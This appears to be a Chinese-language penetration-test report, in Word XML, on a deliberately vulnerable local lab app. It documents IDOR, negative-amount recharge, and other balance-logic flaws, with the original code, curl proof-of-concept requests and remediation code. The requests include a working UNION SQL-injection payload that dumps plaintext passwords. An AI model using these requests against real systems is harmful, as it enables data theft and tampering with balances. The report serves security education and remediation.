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br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>业务逻辑漏洞及越权漏洞</w:t>
        <w:br/>
        <w:t>检测报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>检测目标：用户信息管理平台</w:t>
        <w:br/>
        <w:t>检测日期：2026-07-09</w:t>
        <w:br/>
        <w:t>检测分支：vulnerable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pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>1. 报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>2. 漏洞 1：IDOR 越权访问他人资料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3. 漏洞 2：IDOR 越权为他人充值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>4. 漏洞 3：负金额充值（余额操纵）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>5. 漏洞 4：未登录访问绕过（仅 Session 校验）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>6. 漏洞 5：SQL 注入配合越权获取全量凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>7. 漏洞 6：余额无上限（金融逻辑缺陷）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>8. 漏洞 7：余额可为负值（会计逻辑缺陷）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>9. 漏洞 8：类型转换异常导致静默失败</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>10. 漏洞矩阵与修复建议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报告概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>本报告对用户信息管理平台的个人中心（/profile）和充值（/recharge）功能模块 进行了全面的业务逻辑漏洞和越权漏洞检测。检测发现共 8 类安全漏洞，其中严重级别 3 项，高危 3 项，中危 2 项。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>检测范围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检测目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户信息管理平台 — 个人中心 &amp; 充值模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测分支</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>vulnerable（漏洞版）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2026-07-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>检测工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>curl / 手动渗透测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>alice（普通用户, password=alice2025）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>测试端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GET /profile, POST /recharge, GET /search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漏洞 1：IDOR 越权访问他人资料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IDOR（Insecure Direct Object Reference）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GET /profile?user_id={id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/profile 路由从 URL 参数获取 user_id，直接查询并返回用户资料，未验证当前登录用户与所查询的 user_id 是否匹配。攻击者只需修改 URL 中的 user_id 参数值，即可查看任意用户的敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码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@app.route("/profile")</w:t>
        <w:br/>
        <w:t>def profile():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        user_id = int(request.args.get("user_id", 0))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except ValueError:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        user_id = 0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    user_data = find_user_by_id(user_id)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ❌ 未校验当前用户与 user_id 的匹配关系</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>测试记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>以 alice 用户登录（普通用户），通过修改 URL 参数查看管理员 admin 的资料：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alice 查看 admin 的资料（user_id=1）</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt "http://localhost:5000/profile?user_id=1"</w:t>
        <w:br/>
        <w:t># ✅ 成功：获取到 admin 的邮箱、手机、余额</w:t>
        <w:br/>
        <w:t># 泄露数据: admin@example.com, 13800138000, 余额 100499.0</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>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请求用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>alice（user_id=2, 普通用户）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>目标用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>admin（user_id=1, 管理员）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>修改参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>profile?user_id=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>✅ 成功查看管理员全部资料</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>泄露字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户名、邮箱、手机、角色、余额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3. 漏洞 2：IDOR 越权为他人充值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IDOR 越权操作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/recharge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/recharge 路由从表单参数接收 user_id 和 amount，直接修改对应用户的余额。不校验当前登录用户与目标 user_id 的归属关系，导致任意登录用户可为任意账户充值（或通过负金额扣款）。</w:t>
      </w:r>
    </w:p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alice 给 admin（user_id=1）充值 500 元</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d "user_id=1&amp;amount=500" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/recharge</w:t>
        <w:br/>
        <w:t># ✅ 充值成功，admin 余额从 99999 → 100499</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>风险说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>- 攻击者可控制任意账户余额</w:t>
        <w:br/>
        <w:t>- 与负金额结合，可清空任意账户</w:t>
        <w:br/>
        <w:t>- 可用于洗钱、资金转移</w:t>
        <w:br/>
        <w:t>- 无法追溯操作者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漏洞 3：负金额充值（余额操纵）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业务逻辑缺陷 — 输入校验缺失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/recharge, amount 参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>amount 参数未做正负校验，攻击者可传入负值实现从任意账户扣款。结合 IDOR 漏洞，可清空任意用户余额。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞代码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amount = float(request.form.get("amount", 0))</w:t>
        <w:br/>
        <w:t># ❌ 未校验 amount &gt; 0</w:t>
        <w:br/>
        <w:t>u["balance"] = u["balance"] + amount  # amount 可为负数</w:t>
      </w:r>
    </w:p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alice 给自己充 -1000 元（实际是扣款）</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d "user_id=2&amp;amount=-1000" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/recharge</w:t>
        <w:br/>
        <w:t># ✅ 成功，alice 余额从 100 → -900</w:t>
        <w:br/>
        <w:br/>
        <w:t># 结合 IDOR 可清空 admin 账户</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d "user_id=1&amp;amount=-100000" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/recharge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漏洞 4：未登录访问绕过（仅 Session 校验）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认证绕过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GET /profile, POST /recharge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/profile 和 /recharge 仅通过 session 中的 username 判断登录状态，未对用户权限做分级校验。一旦 session 被劫持或伪造，攻击者可完全控制所有功能。此外，未登录访问时返回 302 跳转，但未使用 HTTP 401/403 状态码。</w:t>
      </w:r>
    </w:p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-s -o /dev/null -w "HTTP %{http_code}" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://localhost:5000/profile?user_id=1"</w:t>
        <w:br/>
        <w:t># HTTP 302（重定向到 /login，非 401/403）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漏洞 5：SQL 注入配合越权获取全量凭据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SQL 注入 + 数据泄露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GET /search?keyword=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>搜索接口使用 f-string 拼接 SQL，且 session 中用户登录后即可访问。攻击者通过 UNION 注入可脱取数据库中所有用户的用户名、密码明文、邮箱、手机号。</w:t>
      </w:r>
    </w:p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脱取所有用户凭据（含密码）</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -G 'http://localhost:5000/search' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --data-urlencode "keyword=' UNION SELECT id,username,password,email,phone FROM users --"</w:t>
        <w:br/>
        <w:t># 结果：admin/admin123, alice/alice2025 等全部泄露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泄露的用户数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>5+（含之前注入创建的测试用户）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>泄露的密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>admin123, alice2025 等明文密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>泄露的敏感字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>用户名、密码、邮箱、手机号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>全量用户凭据泄露，可进一步社工或撞库攻击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7. 漏洞 6：余额无上限（金融逻辑缺陷）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业务逻辑缺陷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/recharge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>充值接口未对金额上限做任何限制。攻击者可一次充值极大金额（如 999999999），导致余额出现天文数字，破坏系统数据一致性和财务报表。</w:t>
      </w:r>
    </w:p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alice 充 999999999 元</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d "user_id=2&amp;amount=999999999" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/recharge</w:t>
        <w:br/>
        <w:t># ✅ 成功，alice 余额变为 999999099.01</w:t>
        <w:br/>
        <w:t># ⚠️ 余额无上限，可导致数据溢出或精度丢失</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>浮点数精度问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>amount 使用 float 类型存储和计算，存在浮点数精度问题。累积多次 0.01 元的充值可能导致余额与实际不符，在金融场景中可能被利用进行"精度套利"。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漏洞 7：余额可为负值（会计逻辑缺陷）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业务逻辑缺陷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POST /recharge + GET /profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>未校验余额扣减后是否为负值，导致用户余额可为负数（-900）。攻击者可利用此漏洞无限透支，造成系统金融数据混乱。</w:t>
      </w:r>
    </w:p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alice 余额原为 100，充值 -1000</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d "user_id=2&amp;amount=-1000" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/recharge</w:t>
        <w:br/>
        <w:t># ✅ 余额变为 -900（负值）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>9. 漏洞 8：类型转换异常导致静默失败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异常处理缺陷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🟢 低危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  <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>漏洞位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6803"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>GET /profile, POST /recharge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>user_id 和 amount 参数使用 int() / float() 强制类型转换，异常时静默降级为默认值（user_id=0, amount=0），而非返回明确的错误提示。这种静默失败可能导致用户混淆，且与搜索功能中的 SQL 注入配合时，攻击者难以被及时发现。</w:t>
      </w:r>
    </w:p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字符串 user_id → 降级为 0 → 显示"用户不存在"</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt "http://localhost:5000/profile?user_id=abc"</w:t>
        <w:br/>
        <w:t># 结果："用户不存在"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 非数字 amount → 降级为 0 → 重定向到 profile</w:t>
        <w:br/>
        <w:t>$ curl -b cookies.txt -d "user_id=2&amp;amount=abc" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  http://localhost:5000/recharge</w:t>
        <w:br/>
        <w:t># 结果：HTTP 302 重定向，无错误提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>10. 漏洞矩阵与修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>漏洞矩阵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417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134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>利用难度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IDOR 越权查看他人资料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全量用户信息泄露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IDOR 越权为他人充值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资金数据篡改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负金额充值（余额操纵）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任意扣款/透支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未登录访问仅 Session 校验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认证机制薄弱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SQL 注入 + 越权数据脱取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全库凭据泄露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余额无上限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数据一致性破坏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余额可为负值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会计数据异常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类型转换异常静默失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1417"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🟢 低危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用户体验缺陷</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>🔴 紧急修复</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. 修复 IDOR 越权 — 校验资源归属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profile 中校验当前用户与目标用户匹配</w:t>
        <w:br/>
        <w:t>def profile():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if "username" not in session:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return redirect("/login")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    current_user = session["username"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        user_id = int(request.args.get("user_id", 0))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    except ValueError:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        abort(400)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 只允许查看自己的资料</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if USERS[current_user]["id"] != user_id:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        abort(403)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. 修复负金额漏洞 — 校验 amount &gt; 0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recharge 中校验金额必须为正</w:t>
        <w:br/>
        <w:t>def recharge():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    amount = float(request.form.get("amount", 0))</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 金额必须为正</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if amount &lt;= 0:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return render_template("error.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                error="金额必须大于 0")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ✅ 金额上限</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if amount &gt; 100000:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        return render_template("error.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                                error="单次充值不能超过 100,000 元")</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. 修复余额负值 — 校验扣减后余额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仅允许管理员扣款，且余额不能为负</w:t>
        <w:br/>
        <w:t>new_balance = u["balance"] + amount</w:t>
        <w:br/>
        <w:t>if new_balance &lt; 0:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("error.html",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                            error="余额不足")</w:t>
        <w:br/>
        <w:t>u["balance"] = new_balance</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4. 修复 SQL 注入 — 使用参数化查询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search 中使用参数化查询替代 f-string</w:t>
        <w:br/>
        <w:t>cursor.execute(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "SELECT id, username, email, phone "</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "FROM users WHERE username LIKE ? OR email LIKE ?",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    (f"%{keyword}%", f"%{keyword}%")</w:t>
        <w:br/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A2E"/>
        </w:rPr>
        <w:t>🟡 建议修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>5. 添加操作审计日志 — 记录谁在何时对哪个账户做了什么操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>6. 添加余额变动上限 — 单日充值/扣款上限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>7. 使用 Decimal 替代 Float — 避免浮点数精度问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>8. 统一错误处理 — 类型转换失败返回 400 Bad Request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>9. Session 加固 — 增加 User-Agent 绑定、IP 绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>10. 速率限制 — 充值接口限制频率，防止批量攻击</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999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18"/>
        </w:rPr>
        <w:t>免责声明：本报告仅用于安全教育和漏洞验证。请在获得授权的前提下进行安全测试。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